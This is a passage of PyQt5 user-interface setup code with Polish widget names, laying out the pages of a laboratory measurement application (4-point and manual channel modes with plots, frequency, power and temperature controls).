self.P2_moc.setGeometry(QtCore.QRect(850-32, 130, 48, 18))\n self.P2_moc.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_moc.setFont(font)\n self.P2_moc.setObjectName(\"P2_moc\")\n\n self.P2_moc_suwak = QtWidgets.QSlider(self.P2_tryb)\n self.P2_moc_suwak.setGeometry(QtCore.QRect(910, 128, 191, 22))\n self.P2_moc_suwak.setOrientation(QtCore.Qt.Horizontal)\n self.P2_moc_suwak.setObjectName(\"P2_moc_suwak\")\n self.P2_moc_suwak.setMinimum(0)\n self.P2_moc_suwak.setMaximum(100)\n self.P2_moc_suwak.setSingleStep(1)\n self.P2_moc_suwak.setProperty(\"value\",0)\n #----->\n\n #<---zakresy-------------\n self.P2_zakres_tekst_p1 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_zakres_tekst_p1.setGeometry(QtCore.QRect(200, 730, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_zakres_tekst_p1.setFont(font)\n self.P2_zakres_tekst_p1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.P2_zakres_tekst_p1.setObjectName(\"P2_zakres_tekst_p1\")\n self.P2_zakres_p1 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_zakres_p1.setGeometry(QtCore.QRect(300, 730, 70, 20))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_zakres_p1.setFont(font)\n self.P2_zakres_p1.setObjectName(\"P2_zakres_p1\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n\n self.P2_zakres_tekst_p2 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_zakres_tekst_p2.setGeometry(QtCore.QRect(770, 730, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_zakres_tekst_p2.setFont(font)\n self.P2_zakres_tekst_p2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.P2_zakres_tekst_p2.setObjectName(\"P2_zakres_tekst_p2\")\n self.P2_zakres_p2 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_zakres_p2.setGeometry(QtCore.QRect(870, 730, 70, 20))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_zakres_p2.setFont(font)\n self.P2_zakres_p2.setObjectName(\"P2_zakres_p2\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n #---------->\n self.stackedWidget.addWidget(self.P2_tryb)\n#----------------->\n\n#<------------tryb 4-punktowy----\n self.page = QtWidgets.QWidget()\n self.page.setObjectName(\"pomiar_4pkt\")\n \n #<-----tempo i sledzenie temperatury-----------\n self.R4_temperatura_tekst = QtWidgets.QLabel(self.page)\n self.R4_temperatura_tekst.setGeometry(QtCore.QRect(750, 470, 181, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_temperatura_tekst.setFont(font)\n self.R4_temperatura_tekst.setObjectName(\"R4_temperatura_tekst\")\n\n self.R4_temperatura = QtWidgets.QLabel(self.page)\n self.R4_temperatura.setGeometry(QtCore.QRect(1050, 470, 65, 18))\n self.R4_temperatura.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_temperatura.setFont(font)\n self.R4_temperatura.setObjectName(\"R4_temperatura\")\n\n self.R4_tempo_tekst = QtWidgets.QLabel(self.page)\n self.R4_tempo_tekst.setGeometry(QtCore.QRect(750, 550, 181, 36))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.R4_tempo_tekst.setFont(font)\n self.R4_tempo_tekst.setAcceptDrops(False)\n self.R4_tempo_tekst.setAutoFillBackground(False)\n self.R4_tempo_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.R4_tempo_tekst.setWordWrap(True)\n self.R4_tempo_tekst.setObjectName(\"R4_tempo_tekst\")\n\n self.R4_tempo = QtWidgets.QLabel(self.page)\n self.R4_tempo.setGeometry(QtCore.QRect(1050, 558, 65, 18))\n self.R4_tempo.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_tempo.setFont(font)\n self.R4_tempo.setObjectName(\"R4_tempo\")\n\n self.R4_sledzenie_temp_tekst = QtWidgets.QLabel(self.page)\n self.R4_sledzenie_temp_tekst.setGeometry(QtCore.QRect(750, 606, 209, 36))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.R4_sledzenie_temp_tekst.setFont(font)\n self.R4_sledzenie_temp_tekst.setAcceptDrops(False)\n self.R4_sledzenie_temp_tekst.setAutoFillBackground(False)\n self.R4_sledzenie_temp_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.R4_sledzenie_temp_tekst.setWordWrap(True)\n self.R4_sledzenie_temp_tekst.setObjectName(\"R4_sledzenie_temp_tekst\")\n\n self.R4_sledzenie_temp_okienko = QtWidgets.QCheckBox(self.page)\n self.R4_sledzenie_temp_okienko.setGeometry(QtCore.QRect(920, 610, 16, 16))\n self.R4_sledzenie_temp_okienko.setText(\"\")\n self.R4_sledzenie_temp_okienko.setObjectName(\"R4_sledzenie_temp_okienko\")\n \n self.R4_sledzenie_temp_wartosc = QtWidgets.QDoubleSpinBox(self.page)\n self.R4_sledzenie_temp_wartosc.setGeometry(QtCore.QRect(1050, 611, 65, 22))\n self.R4_sledzenie_temp_wartosc.setMinimum(-100.0)\n self.R4_sledzenie_temp_wartosc.setMaximum(100.0)\n self.R4_sledzenie_temp_wartosc.setProperty(\"value\", 1.0)\n self.R4_sledzenie_temp_wartosc.setObjectName(\"R4_sledzenie_temp_wartosc\") \n #------------>\n\n #<----okna wykresów------\n self.R4_okno_wykresu_t = QtWidgets.QWidget(self.page)\n self.R4_okno_wykresu_t.setGeometry(QtCore.QRect(730, 80, 410, 260))\n self.R4_okno_wykresu_t.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.R4_okno_wykresu_t.setObjectName(\"R4_okno_wykresu_t\")\n\n self.R4_okno_wykresu_p = QtWidgets.QWidget(self.page)\n self.R4_okno_wykresu_p.setGeometry(QtCore.QRect(40, 81, 660, 620))\n self.R4_okno_wykresu_p.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.R4_okno_wykresu_p.setObjectName(\"R4_okno_wykresu_p\")\n #------------->\n\n #<-----kanały próbka----------\n self.R4_wybor_kanalow_tekst_p = QtWidgets.QLabel(self.page)\n self.R4_wybor_kanalow_tekst_p.setGeometry(QtCore.QRect(200, 710, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_kanalow_tekst_p.setFont(font)\n self.R4_wybor_kanalow_tekst_p.setObjectName(\"R4_wybor_kanalow_tekst_p\")\n \n self.R4_wybor_kanalow_p = QtWidgets.QComboBox(self.page)\n self.R4_wybor_kanalow_p.setGeometry(QtCore.QRect(300, 710, 50, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_kanalow_p.setFont(font)\n self.R4_wybor_kanalow_p.setObjectName(\"R4_wybor_kanalow_p\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n #------------>\n\n #<------wybór osi------ \n self.R4_wybor_osix_tekst_p = QtWidgets.QLabel(self.page)\n self.R4_wybor_osix_tekst_p.setGeometry(QtCore.QRect(550, 710, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_osix_tekst_p.setFont(font)\n self.R4_wybor_osix_tekst_p.setObjectName(\"R4_wybor_osix_tekst_p\")\n\n self.R4_wybor_osix_p = QtWidgets.QComboBox(self.page)\n self.R4_wybor_osix_p.setGeometry(QtCore.QRect(630, 710, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_osix_p.setFont(font)\n self.R4_wybor_osix_p.setObjectName(\"R4_wybor_osix_p\")\n self.R4_wybor_osix_p.addItem(\"\")\n self.R4_wybor_osix_p.addItem(\"\")\n #-------------------------\n\n #<-------zakres-------\n\n self.R4_zakres_tekst = QtWidgets.QLabel(self.page)\n self.R4_zakres_tekst.setGeometry(QtCore.QRect(340, 710, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_zakres_tekst.setFont(font)\n self.R4_zakres_tekst.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.R4_zakres_tekst.setObjectName(\"R4_zakres_tekst\")\n\n self.R4_zakres_p = QtWidgets.QComboBox(self.page)\n self.R4_zakres_p.setGeometry(QtCore.QRect(440, 710, 70, 20))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_zakres_p.setFont(font)\n self.R4_zakres_p.setObjectName(\"R4_zakres_p\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n #------------------>\n\n #<------skala log------\n self.R4_skala_log_p = QtWidgets.QCheckBox(self.page)\n self.R4_skala_log_p.setGeometry(QtCore.QRect(50, 710, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_skala_log_p.setFont(font)\n self.R4_skala_log_p.setObjectName(\"R4_skala_log_p\")\n \n self.R4_skala_log_t = QtWidgets.QCheckBox(self.page)\n self.R4_skala_log_t.setGeometry(QtCore.QRect(740, 340, 141, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_skala_log_t.setFont(font)\n self.R4_skala_log_t.setObjectName(\"R4_skala_log_t\")\n #---------------\n \n #<-----czestotliowsc--------\n self.R4_czestotliowsc_tekst = QtWidgets.QLabel(self.page)\n self.R4_czestotliowsc_tekst.setGeometry(QtCore.QRect(750, 510, 200, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.R4_czestotliowsc_tekst.setFont(font)\n self.R4_czestotliowsc_tekst.setAcceptDrops(False)\n self.R4_czestotliowsc_tekst.setAutoFillBackground(False)\n self.R4_czestotliowsc_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.R4_czestotliowsc_tekst.setWordWrap(True)\n self.R4_czestotliowsc_tekst.setObjectName(\"R4_czestotliowsc_tekst\")\n\n self.R4_czestotliowsc = QtWidgets.QDoubleSpinBox(self.page)\n self.R4_czestotliowsc.setGeometry(QtCore.QRect(1050, 508, 65, 22))\n self.R4_czestotliowsc.setMinimum(5.0)\n self.R4_czestotliowsc.setMaximum(300.0)\n self.R4_czestotliowsc.setSingleStep(1.0)\n self.R4_czestotliowsc.setProperty(\"value\", 5.0)\n self.R4_czestotliowsc.setObjectName(\"R4_czestotliowsc\")\n #--------------->\n \n #<------moc------------\n self.R4_moc_tekst = QtWidgets.QLabel(self.page)\n self.R4_moc_tekst.setGeometry(QtCore.QRect(750, 400, 111, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_moc_tekst.setFont(font)\n self.R4_moc_tekst.setObjectName(\"R4_moc_tekst\")\n\n self.R4_moc_suwak = QtWidgets.QSlider(self.page)\n self.R4_moc_suwak.setGeometry(QtCore.QRect(750, 430, 370, 22))\n self.R4_moc_suwak.setOrientation(QtCore.Qt.Horizontal)\n self.R4_moc_suwak.setObjectName(\"R4_moc_suwak\")\n self.R4_moc_suwak.setMinimum(0)\n self.R4_moc_suwak.setMaximum(100)\n self.R4_moc_suwak.setSingleStep(1)\n self.R4_moc_suwak.setProperty(\"value\",0)\n \n self.R4_moc = QtWidgets.QLabel(self.page)\n self.R4_moc.setGeometry(QtCore.QRect(1050, 400, 65, 18))\n self.R4_moc.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_moc.setFont(font)\n self.R4_moc.setObjectName(\"R4_moc\")\n #---------------->\n\n #<---kanały temp------ \n self.R4_wybor_kanalow_tekst_t = QtWidgets.QLabel(self.page)\n self.R4_wybor_kanalow_tekst_t.setGeometry(QtCore.QRect(990, 340, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_kanalow_tekst_t.setFont(font)\n self.R4_wybor_kanalow_tekst_t.setObjectName(\"R4_wybor_kanalow_tekst_t\")\n\n self.R4_wybor_kanalow_t = QtWidgets.QComboBox(self.page)\n self.R4_wybor_kanalow_t.setGeometry(QtCore.QRect(1090, 340, 50, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_kanalow_t.setFont(font)\n self.R4_wybor_kanalow_t.setObjectName(\"R4_wybor_kanalow_t\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n #----------------->\n\n #<------wybór osi----\n\n #<------start----------- \n self.R4_start = QtWidgets.QPushButton(self.page)\n self.R4_start.setGeometry(QtCore.QRect(750, 670, 221, 61))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.R4_start.setFont(font)\n self.R4_start.setObjectName(\"R4_start\")\n\n self.R4_reset = QtWidgets.QPushButton(self.page)\n self.R4_reset.setGeometry(QtCore.QRect(990, 700, 131, 31))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.R4_reset.setFont(font)\n self.R4_reset.setObjectName(\"R4_reset\")\n \n self.R4_licznik = QtWidgets.QLabel(self.page)\n self.R4_licznik.setGeometry(QtCore.QRect(990, 670, 131, 26))\n self.R4_licznik.setMinimumSize(QtCore.QSize(60, 0))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_licznik.setFont(font)\n self.R4_licznik.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.R4_licznik.setFrameShape(QtWidgets.QFrame.Panel)\n self.R4_licznik.setFrameShadow(QtWidgets.QFrame.Raised)\n self.R4_licznik.setAlignment(QtCore.Qt.AlignCenter)\n self.R4_licznik.setObjectName(\"R4_licznik\")\n #---------------->\n self.stackedWidget.addWidget(self.page)\n#---------------------------->\n\n#<------tryb ręczy--\n self.Tryb_CH20 = QtWidgets.QWidget()\n self.Tryb_CH20.setObjectName(\"Tryb_CH20\")\n\n #<---------okno wykresu----\n self.CH20_okno_wykresu = QtWidgets.QWidget(self.Tryb_CH20)\n self.CH20_okno_wykresu.setGeometry(QtCore.QRect(40, 80, 680, 630))\n self.CH20_okno_wykresu.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.CH20_okno_wykresu.setObjectName(\"CH20_okno_wykresu\")\n #---------------->\n\n #<--------skala log-----------\n self.CH20_skala_log = QtWidgets.QCheckBox(self.Tryb_CH20)\n self.CH20_skala_log.setGeometry(QtCore.QRect(40, 710, 91, 20))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.CH20_skala_log.setFont(font)\n self.CH20_skala_log.setObjectName(\"CH20_skala_log\")\n #------------>\n\n #<-------czestotliwości----\n self.CH20_czestotliowsc_in_tekst = QtWidgets.QLabel(self.Tryb_CH20)\n self.CH20_czestotliowsc_in_tekst.setGeometry(QtCore.QRect(730, 615, 180, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.CH20_czestotliowsc_in_tekst.setFont(font)\n self.CH20_czestotliowsc_in_tekst.setAcceptDrops(False)\n self.CH20_czestotliowsc_in_tekst.setAutoFillBackground(False)\n self.CH20_czestotliowsc_in_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.CH20_czestotliowsc_in_tekst.setWordWrap(True)\n self.CH20_czestotliowsc_in_tekst.setObjectName(\"CH20_czestotliowsc_in_tekst\")\n\n self.CH20_czestotliowsc_in = QtWidgets.QDoubleSpinBox(self.Tryb_CH20)\n self.CH20_czestotliowsc_in.setGeometry(QtCore.QRect(920, 615, 62, 22))\n self.CH20_czestotliowsc_in.setMinimum(2.0)\n self.CH20_czestotliowsc_in.setMaximum(300.0)\n self.CH20_czestotliowsc_in.setSingleStep(1.0)\n self.CH20_czestotliowsc_in.setProperty(\"value\", 3.0)\n self.CH20_czestotliowsc_in.setObjectName(\"CH20_czestotliowsc_in\")\n\n self.CH20_czestotliowsc_out_tekst = QtWidgets.QLabel(self.Tryb_CH20)\n self.CH20_czestotliowsc_out_tekst.setGeometry(QtCore.QRect(730, 650, 171, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.CH20_czestotliowsc_out_tekst.setFont(font)\n self.CH20_czestotliowsc_out_tekst.setAcceptDrops(False)\n self.CH20_czestotliowsc_out_tekst.setAutoFillBackground(False)\n self.CH20_czestotliowsc_out_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.CH20_czestotliowsc_out_tekst.setWordWrap(True)\n self.CH20_czestotliowsc_out_tekst.setObjectName(\"CH20_czestotliowsc_out_tekst\")\n\n self.CH20_czestotliowsc_out = QtWidgets.QDoubleSpinBox(self.Tryb_CH20)\n self.CH20_czestotliowsc_out.setGeometry(QtCore.QRect(920, 650, 62, 22))\n self.CH20_czestotliowsc_out.setMinimum(5.0)\n self.CH20_czestotliowsc_out.setMaximum(300.0)\n self.CH20_czestotliowsc_out.setSingleStep(1.0)\n self.CH20_czestotliowsc_out.setProperty(\"value\", 10.0)\n self.CH20_czestotliowsc_out.setObjectName(\"CH20_czestotliowsc_out\")\n #------------------------->\n\n #<-----start\n self.CH20_start = QtWidgets.QPushButton(self.Tryb_CH20)\n self.CH20_start.setGeometry(QtCore.QRect(1000, 615, 150, 55))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.CH20_start.setFont(font)\n self.CH20_start.setObjectName(\"CH20_start\")\n\n self.CH20_reset = QtWidgets.QPushButton(self.Tryb_CH20)\n self.CH20_reset.setGeometry(QtCore.QRect(1000, 675, 150, 35))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.CH20_reset.setFont(font)\n self.CH20_reset.setObjectName(\"R4_reset\")\n \n self.CH20_licznik = QtWidgets.QLabel(self.Tryb_CH20)\n self.CH20_licznik.setGeometry(QtCore.QRect(920, 685, 62, 25))\n self.CH20_licznik.setMinimumSize(QtCore.QSize(60, 0))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.CH20_licznik.setFont(font)\n self.CH20_licznik.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.CH20_licznik.setFrameShape(QtWidgets.QFrame.Panel)\n self.CH20_licznik.setFrameShadow(QtWidgets.QFrame.Raised)\n self.CH20_licznik.setAlignment(QtCore.Qt.AlignCenter)\n self.CH20_licznik.setObjectName(\"R4_licznik\")\n #---------\n\n #<----wybór kanałów i rodzaju pomiaru---------- \n self.frame = QtWidgets.QFrame(self.Tryb_CH20)\n self.frame.setGeometry(QtCore.QRect(730, 70, 431, 541))\n self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.frame.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame.setLineWidth(1)\n self.frame.setMidLineWidth(0)\n self.frame.setObjectName(\"frame\")\n self.gridLayout_41 = QtWidgets.QGridLayout(self.frame)\n self.gridLayout_41.setObjectName(\"gridLayout_41\")\n self.frame_1 = QtWidgets.QFrame(self.frame)\n self.frame_1.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_1.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_1.setLineWidth(1)\n self.frame_1.setMidLineWidth(0)\n self.frame_1.setObjectName(\"frame_1\")\n self.gridLayout_4 = QtWidgets.QGridLayout(self.frame_1)\n self.gridLayout_4.setObjectName(\"gridLayout_4\")\n self.label_1 = QtWidgets.QLabel(self.frame_1)\n self.label_1.setLineWidth(3)\n self.label_1.setObjectName(\"label_1\")\n self.gridLayout_4.addWidget(self.label_1, 0, 0, 1, 1)\n self.checkBox_1 = QtWidgets.QCheckBox(self.frame_1)\n self.checkBox_1.setText(\"\")\n self.checkBox_1.setObjectName(\"checkBox_1\")\n self.gridLayout_4.addWidget(self.checkBox_1, 0, 1, 1, 1)\n self.comboBox_1 = QtWidgets.QComboBox(self.frame_1)\n self.comboBox_1.setObjectName(\"comboBox_1\")\n self.comboBox_1.addItem(\"\")\n self.comboBox_1.addItem(\"\")\n self.gridLayout_4.addWidget(self.comboBox_1, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_1, 0, 0, 1, 1)\n self.frame_11 = QtWidgets.QFrame(self.frame)\n self.frame_11.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_11.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_11.setLineWidth(1)\n self.frame_11.setMidLineWidth(0)\n self.frame_11.setObjectName(\"frame_11\")\n self.gridLayout_2 = QtWidgets.QGridLayout(self.frame_11)\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n self.label_11 = QtWidgets.QLabel(self.frame_11)\n self.label_11.setLineWidth(3)\n self.label_11.setObjectName(\"label_11\")\n self.gridLayout_2.addWidget(self.label_11, 0, 0, 1, 1)\n self.checkBox_11 = QtWidgets.QCheckBox(self.frame_11)\n self.checkBox_11.setText(\"\")\n self.checkBox_11.setObjectName(\"checkBox_11\")\n self.gridLayout_2.addWidget(self.checkBox_11, 0, 1, 1, 1)\n self.comboBox_11 = QtWidgets.QComboBox(self.frame_11)\n self.comboBox_11.setObjectName(\"comboBox_11\")\n self.comboBox_11.addItem(\"\")\n self.comboBox_11.addItem(\"\")\n self.gridLayout_2.addWidget(self.comboBox_11, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_11, 0, 1, 1, 1)\n self.frame_2 = QtWidgets.QFrame(self.frame)\n self.frame_2.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_2.setLineWidth(1)\n self.frame_2.setMidLineWidth(0)\n self.frame_2.setObjectName(\"frame_2\")\n self.gridLayout_20 = QtWidgets.QGridLayout(self.frame_2)\n self.gridLayout_20.setObjectName(\"gridLayout_20\")\n self.comboBox_2 = QtWidgets.QComboBox(self.frame_2)\n self.comboBox_2.setObjectName(\"comboBox_2\")\n self.comboBox_2.addItem(\"\")\n self.comboBox_2.addItem(\"\")\n self.gridLayout_20.addWidget(self.comboBox_2, 0, 2, 1, 1)\n self.checkBox_2 = QtWidgets.QCheckBox(self.frame_2)\n self.checkBox_2.setText(\"\")\n self.checkBox_2.setObjectName(\"checkBox_2\")\n self.gridLayout_20.addWidget(self.checkBox_2, 0, 1, 1, 1)\n self.label_2 = QtWidgets.QLabel(self.frame_2)\n self.label_2.setLineWidth(3)\n self.label_2.setObjectName(\"label_2\")\n self.gridLayout_20.addWidget(self.label_2, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_2, 1, 0, 1, 1)\n self.frame_12 = QtWidgets.QFrame(self.frame)\n self.frame_12.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_12.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_12.setLineWidth(1)\n self.frame_12.setMidLineWidth(0)\n self.frame_12.setObjectName(\"frame_12\")\n self.gridLayout = QtWidgets.QGridLayout(self.frame_12)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.label_12 = QtWidgets.QLabel(self.frame_12)\n self.label_12.setLineWidth(3)\n self.label_12.setObjectName(\"label_12\")\n self.gridLayout.addWidget(self.label_12, 0, 0, 1, 1)\n self.checkBox_12 = QtWidgets.QCheckBox(self.frame_12)\n self.checkBox_12.setText(\"\")\n self.checkBox_12.setObjectName(\"checkBox_12\")\n self.gridLayout.addWidget(self.checkBox_12, 0, 1, 1, 1)\n self.comboBox_12 = QtWidgets.QComboBox(self.frame_12)\n self.comboBox_12.setObjectName(\"comboBox_12\")\n self.comboBox_12.addItem(\"\")\n self.comboBox_12.addItem(\"\")\n self.gridLayout.addWidget(self.comboBox_12, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_12, 1, 1, 1, 1)\n self.frame_3 = QtWidgets.QFrame(self.frame)\n self.frame_3.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_3.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_3.setLineWidth(1)\n self.frame_3.setMidLineWidth(0)\n self.frame_3.setObjectName(\"frame_3\")\n self.gridLayout_6 = QtWidgets.QGridLayout(self.frame_3)\n self.gridLayout_6.setObjectName(\"gridLayout_6\")\n self.label_3 = QtWidgets.QLabel(self.frame_3)\n self.label_3.setLineWidth(3)\n self.label_3.setObjectName(\"label_3\")\n self.gridLayout_6.addWidget(self.label_3, 0, 0, 1, 1)\n self.checkBox_3 = QtWidgets.QCheckBox(self.frame_3)\n self.checkBox_3.setText(\"\")\n self.checkBox_3.setObjectName(\"checkBox_3\")\n self.gridLayout_6.addWidget(self.checkBox_3, 0, 1, 1, 1)\n self.comboBox_3 = QtWidgets.QComboBox(self.frame_3)\n self.comboBox_3.setObjectName(\"comboBox_3\")\n self.comboBox_3.addItem(\"\")\n self.comboBox_3.addItem(\"\")\n self.gridLayout_6.addWidget(self.comboBox_3, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_3, 2, 0, 1, 1)\n self.frame_13 = QtWidgets.QFrame(self.frame)\n self.frame_13.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_13.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_13.setLineWidth(1)\n self.frame_13.setMidLineWidth(0)\n self.frame_13.setObjectName(\"frame_13\")\n self.gridLayout_14 = QtWidgets.QGridLayout(self.frame_13)\n self.gridLayout_14.setObjectName(\"gridLayout_14\")\n self.label_13 = QtWidgets.QLabel(self.frame_13)\n self.label_13.setLineWidth(3)\n self.label_13.setObjectName(\"label_13\")\n self.gridLayout_14.addWidget(self.label_13, 0, 0, 1, 1)\n self.checkBox_13 = QtWidgets.QCheckBox(self.frame_13)\n self.checkBox_13.setText(\"\")\n self.checkBox_13.setObjectName(\"checkBox_13\")\n self.gridLayout_14.addWidget(self.checkBox_13, 0, 1, 1, 1)\n self.comboBox_13 = QtWidgets.QComboBox(self.frame_13)\n self.comboBox_13.setObjectName(\"comboBox_13\")\n self.comboBox_13.addItem(\"\")\n self.comboBox_13.addItem(\"\")\n self.gridLayout_14.addWidget(self.comboBox_13, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_13, 2, 1, 1, 1)\n self.frame_4 = QtWidgets.QFrame(self.frame)\n self.frame_4.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_4.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_4.setLineWidth(1)\n self.frame_4.setMidLineWidth(0)\n self.frame_4.setObjectName(\"frame_4\")\n self.gridLayout_7 = QtWidgets.QGridLayout(self.frame_4)\n self.gridLayout_7.setObjectName(\"gridLayout_7\")\n self.label_4 = QtWidgets.QLabel(self.frame_4)\n self.label_4.setLineWidth(3)\n self.label_4.setObjectName(\"label_4\")\n self.gridLayout_7.addWidget(self.label_4, 0, 0, 1, 1)\n self.checkBox_4 = QtWidgets.QCheckBox(self.frame_4)\n self.checkBox_4.setText(\"\")\n self.checkBox_4.setObjectName(\"checkBox_4\")\n self.gridLayout_7.addWidget(self.checkBox_4, 0, 1, 1, 1)\n self.comboBox_4 = QtWidgets.QComboBox(self.frame_4)\n self.comboBox_4.setObjectName(\"comboBox_4\")\n self.comboBox_4.addItem(\"\")\n self.comboBox_4.addItem(\"\")\n self.gridLayout_7.addWidget(self.comboBox_4, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_4, 3, 0, 1, 